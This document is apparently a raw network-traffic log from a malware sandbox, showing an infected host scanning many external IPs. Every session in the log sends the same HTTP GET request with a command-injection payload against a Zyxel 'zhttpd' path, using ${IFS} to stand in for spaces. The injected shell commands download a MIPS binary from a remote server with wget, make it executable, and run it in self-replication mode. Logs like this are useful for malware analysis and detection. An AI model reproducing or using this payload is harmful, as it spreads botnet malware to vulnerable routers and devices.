                                                Jan 28, 2024 10:16:25.813477993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4403192.168.2.2342650153.1.223.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813502073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4404192.168.2.234714283.205.39.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813534975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4405192.168.2.235754884.168.197.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813564062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4406192.168.2.2336992123.16.111.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813611031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4407192.168.2.2345842125.170.78.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813641071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4408192.168.2.2345102185.143.178.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813669920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4409192.168.2.2354078139.213.70.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813674927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4410192.168.2.235513462.107.224.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813707113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4411192.168.2.2336136129.20.131.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813770056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4412192.168.2.233392895.100.150.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813786030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4413192.168.2.2341358202.72.207.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813940048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4414192.168.2.2354648136.227.222.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813957930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4415192.168.2.2345022128.47.86.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813986063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4416192.168.2.2360704152.88.203.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814013958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4417192.168.2.235943640.25.117.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814049959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4418192.168.2.2342068148.133.87.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814073086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4419192.168.2.2360770134.197.148.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814100027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4420192.168.2.2340972124.157.173.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814136982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4421192.168.2.236056423.190.81.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814152956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4422192.168.2.234520477.177.13.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814178944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4423192.168.2.2353506125.71.231.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814205885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4424192.168.2.2342760196.236.101.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814234018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4425192.168.2.234101851.17.103.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814290047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4426192.168.2.2340436154.224.171.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814300060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4427192.168.2.2349176218.7.66.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814321995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4428192.168.2.234988294.194.133.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814359903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4429192.168.2.2333348134.9.59.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814394951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4430192.168.2.234788867.101.23.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814424038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4431192.168.2.2335772144.99.251.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814452887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4432192.168.2.23480648.161.164.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814471006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4433192.168.2.2348302156.5.20.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814498901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4434192.168.2.235929853.46.47.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814553976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4435192.168.2.2339192212.211.2.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814572096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4436192.168.2.234801618.158.223.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814587116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4437192.168.2.234090448.178.97.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814605951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4438192.168.2.2356952208.230.79.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814659119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4439192.168.2.2347196182.193.83.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814676046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4440192.168.2.2336902161.126.176.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814707994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4441192.168.2.235205477.7.254.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814728022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4442192.168.2.2354454199.180.254.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814775944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4443192.168.2.234581238.24.222.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814794064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4444192.168.2.2333962154.150.44.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814826012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4445192.168.2.233570445.153.61.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814847946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4446192.168.2.235151058.84.39.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814876080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4447192.168.2.2359046180.238.187.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814922094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4448192.168.2.2348758118.146.15.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814944983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4449192.168.2.2334348121.193.31.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814970016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4450192.168.2.2360970115.207.88.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.814982891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4451192.168.2.2333898223.58.54.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815016985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4452192.168.2.233451250.15.250.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815032959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4453192.168.2.2355110191.137.136.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815037012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4454192.168.2.2357824196.48.194.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815045118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4455192.168.2.2350944102.67.134.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815094948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4456192.168.2.236003671.140.205.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815130949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4457192.168.2.235644086.101.61.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815174103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4458192.168.2.2351984197.158.239.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815196037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4459192.168.2.2339852115.215.243.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815223932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4460192.168.2.2350300209.227.123.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815228939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4461192.168.2.233909082.126.208.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815263987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4462192.168.2.233748273.130.122.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815296888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4463192.168.2.235010654.106.158.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815346003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4464192.168.2.2344644188.112.163.170443
                                                TimestampBytes transferredDirectionData
